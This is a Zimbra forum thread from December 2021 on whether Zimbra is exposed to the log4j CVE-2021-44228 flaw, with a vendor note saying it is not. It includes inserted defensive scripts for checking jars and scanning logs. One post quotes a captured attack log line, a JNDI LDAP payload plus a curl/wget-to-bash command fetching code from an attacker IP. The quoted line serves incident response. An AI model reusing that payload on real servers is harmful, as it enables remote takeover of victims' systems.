Zimbra not affected by log4j (CVE-2021-44228)
After intensive review and testing, Zimbra Development has determined that the log4j zero-day vulnerability (CVE-2021-44228) does not affect the currently supported Zimbra versions (9.0.0 and 8.8.15). Zimbra Collaboration Server currently uses log4j 1.2.16, which does not contain the lookup expression feature found in versions 2.0 to 2.17 that is the cause of the vulnerability. The Red Hat-reported vulnerability CVE-2021-4104 likewise does not affect Zimbra Collaboration Server 8.8.15 and 9.0.0: for it to affect the server, it requires JMSAppender, which the ZCS server does not use, together with the ability to append to configuration files.

log4j-zero-day exploit - active attacks

irv
Posts: 6
Joined: Mon Jun 04, 2018 12:04 am

log4j-zero-day exploit - active attacks

Postby irv » Fri Dec 10, 2021 9:37 pm

Hi

Need confirmation. Zimbra uses log4j, and now I got an alert from CVE with a threat rated 10/10.
If so, to what extent and which versions of Zimbra servers are affected?



https://wiki.zimbra.com/wiki/Using_log4 ... xd_Logging

About the exploit:
"unauthenticated RCE vulnerability allowing complete system takeover on systems with Log4j 2.0-beta9 up to 2.14.1"

https://www.bleepingcomputer.com/news/s ... nightmare/

How this works:
https://www.lunasec.io/docs/blog/log4j-zero-day/


JDunphy
Outstanding Member
Posts: 682
Joined: Fri Sep 12, 2014 11:18 pm
Location: Victoria, BC
ZCS/ZD Version: 8.8.15_P28 RHEL8 Network Edition

Re: log4j-zero-day exploit - active attacks

Postby JDunphy » Fri Dec 10, 2021 9:52 pm

I have been through this today and think we are ok but would be interested if others believe otherwise. Zimbra could you guys comment?

It appears to be log4j versions 2.0-beta9 through 2.14.1 ... I have also found a hash database of various vulnerable libs and did a find on our systems for log4j libs, and found no match for those. The only thing I found was
apache-log4j-extras-1.0.jar, which I don't believe is a problem. Didn't find any that appear to be vulnerable. My references:

Ref: https://github.com/mubix/CVE-2021-44228 ... ell-Hashes

List of attacking IPs for ipsets, etc. GreyNoise is providing these in real time for IPs that are actively attacking.
Ref: https://gist.githubusercontent.com/gnre ... 28_IPs.csv

Ref: https://blog.cloudflare.com/cve-2021-44 ... itigation/

Jim
pixelplumber
Advanced member
Posts: 52
Joined: Fri Sep 12, 2014 10:27 pm

Re: log4j-zero-day exploit - active attacks

Postby pixelplumber » Fri Dec 10, 2021 9:58 pm

This post on the Confluence community also suggests that ver. 1.x is not vulnerable to the JNDI exploit, but I can't verify that.

Looking for log4j, all I can see is:

# find / -name '*log4j*'
/opt/zimbra/common/jetty_home/modules/logging-log4j.mod
/opt/zimbra/common/jetty_home/modules/logging-log4j2.mod
/opt/zimbra/common/jetty_home/modules/slf4j-log4j.mod
/opt/zimbra/common/jetty_home/modules/slf4j-log4j2.mod
/opt/zimbra/common/jetty_home/modules/log4j2-slf4j.mod
/opt/zimbra/common/jetty_home/modules/log4j-impl
/opt/zimbra/common/jetty_home/modules/log4j-impl/resources/log4j.xml
/opt/zimbra/common/jetty_home/modules/log4j-impl.mod
/opt/zimbra/common/jetty_home/modules/log4j2-api.mod
/opt/zimbra/common/jetty_home/modules/log4j2-impl
/opt/zimbra/common/jetty_home/modules/log4j2-impl/resources/log4j2.xml
/opt/zimbra/common/jetty_home/modules/log4j2-impl.mod
/opt/zimbra/conf/log4j.properties.in
/opt/zimbra/conf/milter.log4j.properties
/opt/zimbra/conf/zmconfigd.log4j.properties
/opt/zimbra/conf/log4j.properties
/opt/zimbra/lib/jars/apache-log4j-extras-1.0.jar
/opt/zimbra/lib/jars/slf4j-log4j12-1.7.30.jar
/opt/zimbra/lib/jars/log4j-1.2.16.jar
/opt/zimbra/lib/jars/syslog4j-0.9.46.jar
/opt/zimbra/log/zmconfigd-log4j.log
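The jars in the find output above can be checked by content rather than by name or by the hash list Jim linked. As an added example (not Zimbra's code and not from any poster here), this script looks inside a jar for the log4j 2 JndiLookup class (the lookup feature the banner at the top says 1.2.16 lacks) and the log4j 1 JMSAppender class, and checks a log4j.properties text for a configured JMSAppender, which is the CVE-2021-4104 precondition the banner describes. The jars and properties text are constructed in memory; point `assess()` at the real paths under /opt/zimbra/lib/jars and /opt/zimbra/conf to check an install.

```python
import io
import re
import zipfile

# Marker class of the log4j 2.x JNDI lookup (the feature behind CVE-2021-44228);
# log4j 1.2.x has no such class, which is why a 1.2.16 jar is out of scope.
JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
# log4j 1.2.x ships JMSAppender; CVE-2021-4104 only matters when the logging
# configuration actually wires it in.
JMS_APPENDER = "org/apache/log4j/net/JMSAppender.class"
# A log4j 1.x properties line that configures a JMSAppender.
JMS_CONF_RE = re.compile(
    r"^\s*log4j\.appender\.[^=\s]+\s*=\s*org\.apache\.log4j\.net\.JMSAppender\s*$", re.M)


def inspect_jar(jar):
    """Report which marker classes a jar contains (path or file-like object)."""
    with zipfile.ZipFile(jar) as zf:
        names = set(zf.namelist())
    return {"jndi_lookup": JNDI_LOOKUP in names, "jms_appender": JMS_APPENDER in names}


def assess(jar, properties_text):
    """Verdict for one jar plus the log4j.properties that goes with it."""
    found = inspect_jar(jar)
    if found["jndi_lookup"]:
        return "log4j2-jndi-lookup-present"      # CVE-2021-44228 lookup class on classpath
    if found["jms_appender"] and JMS_CONF_RE.search(properties_text):
        return "log4j1-jms-appender-configured"  # CVE-2021-4104 precondition is met
    if found["jms_appender"]:
        return "log4j1-jms-appender-unused"      # class present but not configured
    return "no-log4j-markers"


def make_jar(entries):
    """Constructed in-memory jar with empty entries (a stand-in, not a real artifact)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name in entries:
            zf.writestr(name, b"")
    buf.seek(0)
    return buf


# Constructed stand-ins for a 1.2.x-style and a 2.x-style jar, and a properties
# file that only configures a file appender (no JMSAppender).
SAMPLE_LOG4J1 = [JMS_APPENDER, "org/apache/log4j/Logger.class"]
SAMPLE_LOG4J2 = [JNDI_LOOKUP, "org/apache/logging/log4j/core/Logger.class"]
SAMPLE_CONF = ("log4j.rootLogger=INFO, LOGFILE\n"
               "log4j.appender.LOGFILE=org.apache.log4j.RollingFileAppender\n")
```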
irv
Posts: 6
Joined: Mon Jun 04, 2018 12:04 am

Re: log4j-zero-day exploit - active attacks

Postby irv » Fri Dec 10, 2021 10:02 pm

Thanks for that .csv file. Just implemented a script to block those IPs on the firewalls.
And checking to see if my installations of Zimbra are affected.
I also have a couple of VMware systems, but I'm looking for the VMware KB to be updated and for patches.

I have old zimbra running also.
Release 8.6.0.GA.1153.UBUNTU14.64 UBUNTU14_64 FOSS edition, Patch 8.6.0_P7.

And I wonder if that version is affected. Can anyone point me somewhere I could find some more details?

Thanks.



JDunphy wrote:I have been through this today and think we are ok but would be interested if others believe otherwise. Zimbra could you guys comment?

It appears to be log4j versions 2.0-beta9 through 2.14.1 ... I have also found a hash database of various vulnerable libs and did a find on our systems for log4j libs, and found no match for those. The only thing I found was
apache-log4j-extras-1.0.jar, which I don't believe is a problem. Didn't find any that appear to be vulnerable. My references:

Ref: https://github.com/mubix/CVE-2021-44228 ... ell-Hashes

List of attacking IPs for ipsets, etc. GreyNoise is providing these in real time for IPs that are actively attacking.
Ref: https://gist.githubusercontent.com/gnre ... 28_IPs.csv

Ref: https://blog.cloudflare.com/cve-2021-44 ... itigation/

Jim
pixelplumber
Advanced member
Posts: 52
Joined: Fri Sep 12, 2014 10:27 pm

Re: log4j-zero-day exploit - active attacks

Postby pixelplumber » Fri Dec 10, 2021 10:04 pm

JDunphy wrote:I have been through this today and think we are ok but would be interested if others believe otherwise. Zimbra could you guys comment?

It appears to be log4j versions 2.0-beta9 through 2.14.1 ... I have also found a hash database of various vulnerable libs and did a find on our systems for log4j libs, and found no match for those. The only thing I found was
apache-log4j-extras-1.0.jar, which I don't believe is a problem. Didn't find any that appear to be vulnerable. My references:

Ref: https://github.com/mubix/CVE-2021-44228 ... ell-Hashes
Jim

In Jim's link to the hashes above, they mention that 1.x might be vulnerable too, with a link to a GitHub issue mentioning an avenue by which lookups could be triggered?
sigtrap
Posts: 5
Joined: Sat Sep 13, 2014 1:35 am

Re: log4j-zero-day exploit - active attacks

Postby sigtrap » Fri Dec 10, 2021 10:19 pm

irv wrote:Thanks for that .csv file. Just implemented a script to block those IPs on the firewalls.
And checking to see if my installations of Zimbra are affected.
I also have a couple of VMware systems, but I'm looking for the VMware KB to be updated and for patches.

I have old zimbra running also.
Release 8.6.0.GA.1153.UBUNTU14.64 UBUNTU14_64 FOSS edition, Patch 8.6.0_P7.

And I wonder if that version is affected. Can anyone point me somewhere I could find some more details?

Thanks.


I have tested a Zimbra 8.7.11 Patch11 and it looks vulnerable. Very easy attack vector.
(lib log4j-1.2.16.jar)
irv
Posts: 6
Joined: Mon Jun 04, 2018 12:04 am

Re: log4j-zero-day exploit - active attacks

Postby irv » Fri Dec 10, 2021 10:36 pm

45.155.205.233 - - [10/Dec/2021:14:23:29 +0100] "GET / HTTP/1.1" 200 300 "-" "${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwg(......)}"
(curl -s 45.155.205.233:5874/(cut):80||wget -q -O- 45.155.205.233:5874/(cut):80)|bash

I found that, so looks like they are trying.

I think fail2ban on the firewall plus log monitoring can help temporarily to cut off those attacks.

sigtrap wrote:
irv wrote:Thanks for that .csv file. Just implemented a script to block those IPs on the firewalls.
And checking to see if my installations of Zimbra are affected.
I also have a couple of VMware systems, but I'm looking for the VMware KB to be updated and for patches.

I have old zimbra running also.
Release 8.6.0.GA.1153.UBUNTU14.64 UBUNTU14_64 FOSS edition, Patch 8.6.0_P7.

And I wonder if that version is affected. Can anyone point me somewhere I could find some more details?

Thanks.


I have tested a Zimbra 8.7.11 Patch11 and it looks vulnerable. Very easy attack vector.
(lib log4j-1.2.16.jar)
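The probe irv found in the access log is the kind of line that the log monitoring he mentions should catch. As an added example (not from any poster in this thread), this script parses combined-format access-log lines, URL-decodes the request, referer and user-agent fields, flags `${jndi:` lookups with the scheme they name, and tallies hits per source IP so the result can feed an ipset or a fail2ban-style block list. The sample lines are constructed with RFC 5737 documentation addresses and a harmless Base64 segment.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Combined access-log format: client IP first; request, referer and user-agent quoted.
ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) \S+ '
    r'"(?P<ref>[^"]*)" "(?P<ua>[^"]*)"')
# A JNDI lookup string is the hallmark of a CVE-2021-44228 probe; the scheme
# (ldap, rmi, dns, ...) says which kind of callback the sender expected.
JNDI_RE = re.compile(r"\$\{jndi:(?P<scheme>[a-z]+):", re.I)


def parse_line(line):
    """Split one access-log line into named fields, or None if it does not parse."""
    m = ACCESS_RE.match(line)
    return m.groupdict() if m else None


def find_jndi_probe(entry):
    """(field, scheme) of the first URL-decoded field carrying a JNDI lookup, else None."""
    for field in ("req", "ref", "ua"):
        m = JNDI_RE.search(unquote(entry[field]))
        if m:
            return field, m.group("scheme").lower()
    return None


def scan(lines):
    """Count probes per source IP (block-list input) and keep a detail row per hit."""
    hits, details = Counter(), []
    for line in lines:
        entry = parse_line(line)
        probe = find_jndi_probe(entry) if entry else None
        if probe:
            hits[entry["ip"]] += 1
            details.append((entry["ip"], entry["ts"], probe[0], probe[1]))
    return hits, details


# Constructed sample lines using RFC 5737 documentation addresses; the Base64
# segment decodes to the harmless string "ABC", not a command.
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Dec/2021:14:23:29 +0100] "GET / HTTP/1.1" 200 300 "-" '
    '"${jndi:ldap://192.0.2.10:12344/Basic/Command/Base64/QUJD}"',
    '198.51.100.7 - - [10/Dec/2021:14:25:01 +0100] "GET /?x=%24%7Bjndi%3Armi%3A%2F%2F'
    '198.51.100.7%2Fa%7D HTTP/1.1" 404 0 "-" "curl/7.68.0"',
    '203.0.113.5 - - [10/Dec/2021:14:26:12 +0100] "GET /zimbra/ HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [10/Dec/2021:14:27:40 +0100] "POST /service/soap HTTP/1.1" 200 512 "-" '
    '"${jndi:dns://192.0.2.10/x}"',
]
```

`scan()` returns the per-IP counts and detail rows; the second sample line shows why decoding matters, since the lookup string only appears after the query string is URL-decoded.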
PL123
Posts: 3
Joined: Fri Dec 10, 2021 10:59 pm

Re: log4j-zero-day exploit - active attacks

Postby PL123 » Fri Dec 10, 2021 11:03 pm

Can confirm Zimbra 8.8.15_GA_4177 is vulnerable as well.
L. Mark Stone
Elite member
Posts: 2309
Joined: Wed Oct 09, 2013 11:35 am
Location: Portland, Maine, US
ZCS/ZD Version: 8.8.15 Network Edition

Re: log4j-zero-day exploit - active attacks

Postby L. Mark Stone » Fri Dec 10, 2021 11:12 pm

I opened a Support Case with Zimbra on this earlier today. Zimbra have reported back to me that the 1.2.16 version of Log4j used by Zimbra is NOT subject to this exploit.

If anyone can prove otherwise, please send me a private message and I will get this escalated within Synacor.

All the best,
Mark
___________________________________
L. Mark Stone
Mission Critical Email - Zimbra VAR/BSP/Training Partner https://www.missioncriticalemail.com/
Zeta Alliance http://www.zetalliance.org/
PL123
Posts: 3
Joined: Fri Dec 10, 2021 10:59 pm

Re: log4j-zero-day exploit - active attacks

Postby PL123 » Fri Dec 10, 2021 11:31 pm

L. Mark Stone wrote:If anyone can prove otherwise, please send me a private message and I will get this escalated within Synacor.


I don't see an option to send you a PM. Might be because my account is new or something. I'm happy to send you info to replicate it yourself.
